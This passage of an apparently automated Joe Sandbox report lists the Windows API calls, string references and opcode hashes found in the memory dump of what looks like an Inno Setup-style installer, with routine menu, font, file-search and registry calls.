                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550DeleteHandleModule
                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                          • API String ID: 470921693-1846899949
                                          • Opcode ID: fba564e9f5f9f210018b68d7ed56646b15d5308277a25301db98864e6a1c2157
                                          • Instruction ID: 62ebb0c2f71abb8bc92ace695c7d2b4d00ef98af284bd370ad9ae17fcec81740
                                          • Opcode Fuzzy Hash: fba564e9f5f9f210018b68d7ed56646b15d5308277a25301db98864e6a1c2157
                                          • Instruction Fuzzy Hash: DEE02BB0F826346AD22037697C4AF9B2718CB14321F50493BB005751D2D6BC0880CF6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemMetrics.USER32 ref: 004769AE
                                          • GetSystemMetrics.USER32 ref: 004769B6
                                          • GetSystemMenu.USER32(00000000,00000000,00000000,00476A77), ref: 00476A0F
                                          • AppendMenuA.USER32 ref: 00476A20
                                          • AppendMenuA.USER32 ref: 00476A38
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: MenuSystem$AppendMetrics
                                          • String ID:
                                          • API String ID: 4092608398-0
                                          • Opcode ID: 0a58bcd2f7566254b3e1c0a11509b3060d16c145df205e1e68c56360b64492b4
                                          • Instruction ID: 95fc3f10e04f950199989cf52bad7493749d61a9b456fc21dcab856dcf260ed5
                                          • Opcode Fuzzy Hash: 0a58bcd2f7566254b3e1c0a11509b3060d16c145df205e1e68c56360b64492b4
                                          • Instruction Fuzzy Hash: 0C3125B17047146BD710EF368C82B9A3B969B02318F41847EF944AB3E3CA7D9C08875D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CloseHandle.KERNEL32(?), ref: 0045392F
                                          • WaitForInputIdle.USER32 ref: 00453940
                                          • MsgWaitForMultipleObjects.USER32 ref: 00453963
                                          • GetExitCodeProcess.KERNEL32 ref: 00453973
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0045397C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseHandleWait$CodeExitIdleInputMultipleObjectsProcess
                                          • String ID:
                                          • API String ID: 2750287839-0
                                          • Opcode ID: 5917eda15862926d7c0e30986b5aa3e6850667ac7e6dbbe4fcda712edbe667af
                                          • Instruction ID: 1fb8955f118ef69bc210d6eece1c5cf55282b31e3a6318546598b334ca376582
                                          • Opcode Fuzzy Hash: 5917eda15862926d7c0e30986b5aa3e6850667ac7e6dbbe4fcda712edbe667af
                                          • Instruction Fuzzy Hash: B40171B1504709BADF10EFE9CC45BDE77ACAF05325F10412BB914AB1D2CA7C9A44CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetActiveWindow.USER32(?,?,00000000,00477D73,?,?,00000001,?), ref: 00477B83
                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00477BE9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ActiveChangeNotifyWindow
                                          • String ID: $Need to restart Windows? %s
                                          • API String ID: 1160245247-4200181552
                                          • Opcode ID: 219883ad965e97e5bf244b95060c0e4a642d34d1cef0d483a05b57c28bcc9892
                                          • Instruction ID: d3f02237412e89892c7930d271b9ef2760b6198a5a67d929d28789f2d65efbe3
                                          • Opcode Fuzzy Hash: 219883ad965e97e5bf244b95060c0e4a642d34d1cef0d483a05b57c28bcc9892
                                          • Instruction Fuzzy Hash: 7981A6306042449FDB14EF69D881B9E77F4EF46308F5084BBE8149B362D778A905CB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042C81C: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C840
                                            • Part of subcall function 0042CBC4: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0042CD0A,00000000,0042CD30,?,?,?,00000000,00000000,?,0042CD45), ref: 0042CBEC
                                          • GetLastError.KERNEL32(00000000,004684D9,?,?,00000001,004AE064), ref: 004683B6
                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00468430
                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00468455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ChangeNotify$CharErrorFullLastNamePathPrev
                                          • String ID: Creating directory: %s
                                          • API String ID: 2168629741-483064649
                                          • Opcode ID: f1cb742da8d3e2a930c6db133d36d8361f831a3e880e7da6ba55a63c83772f20
                                          • Instruction ID: 7d789868f9cce9af9f7365a105495f9b42d68ffbac0df78c77a177914cd324d8
                                          • Opcode Fuzzy Hash: f1cb742da8d3e2a930c6db133d36d8361f831a3e880e7da6ba55a63c83772f20
                                          • Instruction Fuzzy Hash: 89513634E00249ABDB00DFA5C982BDEB7F5AF48304F50856EE850B7391EB795E04CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5550.KERNEL32(00000000,SfcIsFileProtected,00000000,00453714), ref: 0045364E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00453714), ref: 004536B8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ByteCharD5550MultiWide
                                          • String ID: SfcIsFileProtected$sfc.dll
                                          • API String ID: 2811115374-591603554
                                          • Opcode ID: 10261435de4ae9b06394bc9a324ab7858c06d9ac19c4e1deedf2d297263d8c0c
                                          • Instruction ID: 1080a8b8f05c2285e4028fb1a0b0b0b0736e4f1e3e2d6b590f5a5cfcaecd4d0c
                                          • Opcode Fuzzy Hash: 10261435de4ae9b06394bc9a324ab7858c06d9ac19c4e1deedf2d297263d8c0c
                                          • Instruction Fuzzy Hash: 04419670A00218ABE720EF55CC85B9E77B8EB44346F5045BBE908A7392D7789F48DA18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • RegCloseKey.ADVAPI32(?,0045421F,?,00000001,00000000), ref: 00454212
                                          Strings
                                          • PendingFileRenameOperations2, xrefs: 004541F3
                                          • PendingFileRenameOperations, xrefs: 004541E4
                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004541C0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6790
                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                          • API String ID: 3513276378-2115312317
                                          • Opcode ID: 7952b933e601e31c3134de1c1834e2b8603df5e294ab7a413bef5ef84e27e09b
                                          • Instruction ID: c798bacfa756c0e5034ad30e8c50e244f89f96b57903828c66e2d8538055c7c3
                                          • Opcode Fuzzy Hash: 7952b933e601e31c3134de1c1834e2b8603df5e294ab7a413bef5ef84e27e09b
                                          • Instruction Fuzzy Hash: B6F0F6322482086FDB04D6E2DC03E1A73DCC7C4759FB184A7F9009FA82DA78AE54921C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046A649,?,00000000,?,00000001,00000000,0046A817,?,00000000,?,00000000,?,0046A9D2), ref: 0046A625
                                          • FindClose.KERNEL32(000000FF,0046A650,0046A649,?,00000000,?,00000001,00000000,0046A817,?,00000000,?,00000000,?,0046A9D2,?), ref: 0046A643
                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046A76B,?,00000000,?,00000001,00000000,0046A817,?,00000000,?,00000000,?,0046A9D2), ref: 0046A747
                                          • FindClose.KERNEL32(000000FF,0046A772,0046A76B,?,00000000,?,00000001,00000000,0046A817,?,00000000,?,00000000,?,0046A9D2,?), ref: 0046A765
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileNext
                                          • String ID:
                                          • API String ID: 2066263336-0
                                          • Opcode ID: 642c4e1e54191ea309fcd4058225aab2fa0062ac43964b02fb0fa2f81c6087ad
                                          • Instruction ID: 9e3b6bbb7669584a5b08e44b159600427b84327eb66dec1ab996ae4c3905ae8d
                                          • Opcode Fuzzy Hash: 642c4e1e54191ea309fcd4058225aab2fa0062ac43964b02fb0fa2f81c6087ad
                                          • Instruction Fuzzy Hash: 71B13C7490424DAFCF11DFA9C841ADEBBB8BF49304F5081AAE848B3291D7389E55CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetMenu.USER32(00000000), ref: 00421429
                                          • SetMenu.USER32(00000000,00000000), ref: 00421446
                                          • SetMenu.USER32(00000000,00000000), ref: 0042147B
                                          • SetMenu.USER32(00000000,00000000), ref: 00421497
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Menu
                                          • String ID:
                                          • API String ID: 3711407533-0
                                          • Opcode ID: b740002c252b0eaa61b67f3d7df36a4faddbe39b5bd2e3a745d4ad23bf4fc522
                                          • Instruction ID: ed2eec1c9df0a1c35cc319bbddc0436bf923f05cb9cc28f34756a25b8f072dfe
                                          • Opcode Fuzzy Hash: b740002c252b0eaa61b67f3d7df36a4faddbe39b5bd2e3a745d4ad23bf4fc522
                                          • Instruction Fuzzy Hash: 8741A1307002645BDB20FB3AA8857AA66964F61308F4906BFFC499F3A7CA7DCC45835D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 739214E0.VERSION(00000000,?,?,?,0048A535), ref: 004510C4
                                          • 739214C0.VERSION(00000000,?,00000000,?,00000000,0045113F,?,00000000,?,?,?,0048A535), ref: 004510F1
                                          • 73921500.VERSION(?,004511C4,?,?,00000000,?,00000000,?,00000000,0045113F,?,00000000,?,?,?,0048A535), ref: 0045110B
                                          • 73921500.VERSION(00000000,004511C4,?,?,00000000,004511B2,?,00000000,?,?,?,0048A535), ref: 0045117E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: 73921473921500
                                          • String ID:
                                          • API String ID: 3586553354-0
                                          • Opcode ID: 69b6c89ab7e58b08d2ef8c32711442488174024db6fa8cbe7fb001bea91ad0d4
                                          • Instruction ID: c8f8831e43f873d46ab33d5beb91d9861939245644d7e1d35c8cdbeedf39938d
                                          • Opcode Fuzzy Hash: 69b6c89ab7e58b08d2ef8c32711442488174024db6fa8cbe7fb001bea91ad0d4
                                          • Instruction Fuzzy Hash: BA318D71A04609AFDB01DAA9CC41EBFB7ECEB4D304F5504BAED00E3292D6799D09C769
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 72E5AC50.USER32(00000000,?,00000000,00000000,0044B1FB,?,?,?,?), ref: 0044B14F
                                          • SelectObject.GDI32(?,00000000), ref: 0044B175
                                          • DrawTextA.USER32(?,00000000,00000000,?,00000000), ref: 0044B1A2
                                          • 72E5B380.USER32(00000000,?,0044B1C7,0044B1C0,?,00000000,?,00000000,00000000,0044B1FB,?,?,?,?), ref: 0044B1BA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: B380DrawObjectSelectText
                                          • String ID:
                                          • API String ID: 1652335368-0
                                          • Opcode ID: bc4c7d88200d52cf54ed5a5e5976a6b8a21a2d9495f428531505900e307e05ca
                                          • Instruction ID: bf10fe6f08034a2c68b865162127de74a15735e291b7bdd25d7118bf05ecb826
                                          • Opcode Fuzzy Hash: bc4c7d88200d52cf54ed5a5e5976a6b8a21a2d9495f428531505900e307e05ca
                                          • Instruction Fuzzy Hash: 2A317070A04248BFEB11DFA5C856F9EBBF9EB49304F5140A6F404E7291D7389E40CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageA.USER32(?,?,?,?), ref: 00416C4C
                                          • SetTextColor.GDI32(?,00000000), ref: 00416C66
                                          • SetBkColor.GDI32(?,00000000), ref: 00416C80
                                          • CallWindowProcA.USER32 ref: 00416CA8
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Color$CallMessageProcSendTextWindow
                                          • String ID:
                                          • API String ID: 601730667-0
                                          • Opcode ID: d2ffe42f13c1091e28b7b9725e3c877c548081e4286fc0418fecb33e28b2a67f
                                          • Instruction ID: 269df164a710b99dec436246b5747d638c90ae1c4ded9ebfccc10c4a0f795a7e
                                          • Opcode Fuzzy Hash: d2ffe42f13c1091e28b7b9725e3c877c548081e4286fc0418fecb33e28b2a67f
                                          • Instruction Fuzzy Hash: 101151B1600600AFC710EF6ECD80E9773EDEF48314715882AB59ACB701D638EC418BAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 72E5AC50.USER32(00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001,00000000), ref: 004231E6
                                          • EnumFontsA.GDI32(00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001,00000000), ref: 004231F9
                                          • 72E5AD70.GDI32(00000000,0000005A,00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001), ref: 00423201
                                          • 72E5B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000), ref: 0042320C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: B380EnumFonts
                                          • String ID:
                                          • API String ID: 1693878748-0
                                          • Opcode ID: 03e727ae4ca16b473abeaf2b1cfb166d6fa29172ef8634f232deafc1f7f05573
                                          • Instruction ID: c5365d0d9a92aae00af3c8bde8748560cc1d8ccf97e4765f8d554caa7d1de9f2
                                          • Opcode Fuzzy Hash: 03e727ae4ca16b473abeaf2b1cfb166d6fa29172ef8634f232deafc1f7f05573
                                          • Instruction Fuzzy Hash: 4A01D2B17482106AE300BFBA5C86B9D3A94DF16319F00427BFD08BF2C2D67E8904476E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlInitializeCriticalSection.KERNEL32(0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019EA
                                          • RtlEnterCriticalSection.KERNEL32(0048D420,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019FD
                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A27
                                          • RtlLeaveCriticalSection.KERNEL32(0048D420,00401A91,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A84
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                          • String ID:
                                          • API String ID: 730355536-0
                                          • Opcode ID: 7b4d27c78d3ec42cdf42d9613c85a14480417dbf98181b1af69a1b7d87031786
                                          • Instruction ID: edc66444bf91dbccd637f871198ccf20bfd66fdd9cc5066f76d2897232331e27
                                          • Opcode Fuzzy Hash: 7b4d27c78d3ec42cdf42d9613c85a14480417dbf98181b1af69a1b7d87031786
                                          • Instruction Fuzzy Hash: CD018070E463445EF315BB699806B2D3B95D786B08F51887FF440A7AF2C77C68408B2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040348C: GetModuleHandleA.KERNEL32(00000000,0048B766), ref: 00403493
                                            • Part of subcall function 0040348C: GetCommandLineA.KERNEL32(00000000,0048B766), ref: 0040349E
                                            • Part of subcall function 00409C40: 6F7ADB20.COMCTL32(0048B775), ref: 00409C40
                                            • Part of subcall function 00410A1C: GetCurrentThreadId.KERNEL32 ref: 00410A6A
                                            • Part of subcall function 00419108: GetVersion.KERNEL32(0048B789), ref: 00419108
                                            • Part of subcall function 004321C0: OleInitialize.OLE32(00000000), ref: 004321CC
                                            • Part of subcall function 0044F3E8: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0048B7A2), ref: 0044F423
                                            • Part of subcall function 0044F3E8: 6CAD5550.KERNEL32(00000000,user32.dll,NotifyWinEvent,0048B7A2), ref: 0044F429
                                            • Part of subcall function 00451C94: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CB4
                                            • Part of subcall function 00451C94: 6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CBA
                                            • Part of subcall function 00451C94: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CCE
                                            • Part of subcall function 00451C94: 6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CD4
                                            • Part of subcall function 00466368: RegisterClipboardFormatA.USER32 ref: 0046636D
                                          • SetErrorMode.KERNEL32(00000001,00000000,0048B7FE), ref: 0048B7D0
                                            • Part of subcall function 0048B568: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0048B7DA,00000001,00000000,0048B7FE), ref: 0048B572
                                            • Part of subcall function 0048B568: 6CAD5550.KERNEL32(00000000,user32.dll,DisableProcessWindowsGhosting,0048B7DA,00000001,00000000,0048B7FE), ref: 0048B578
                                            • Part of subcall function 0042459C: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004245BB
                                            • Part of subcall function 0042438C: SetWindowTextA.USER32(?,00000000), ref: 004243A4
                                          • ShowWindow.USER32(?,00000005,00000000,0048B7FE), ref: 0048B831
                                            • Part of subcall function 00477240: SetActiveWindow.USER32(?), ref: 004772DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: HandleModule$D5550$Window$ActiveClipboardCommandCurrentErrorFormatInitializeLineMessageModeRegisterSendShowTextThreadVersion
                                          • String ID: Setup
                                          • API String ID: 1906813367-3839654196
                                          • Opcode ID: 73dd2796517a7e24d17ffc93994b351d99c23e78418e73e458febebc51486027
                                          • Instruction ID: 64d8c448c096c2f6580127d36ea2c8f862acc3958c68ac9c2a5694fa641c873f
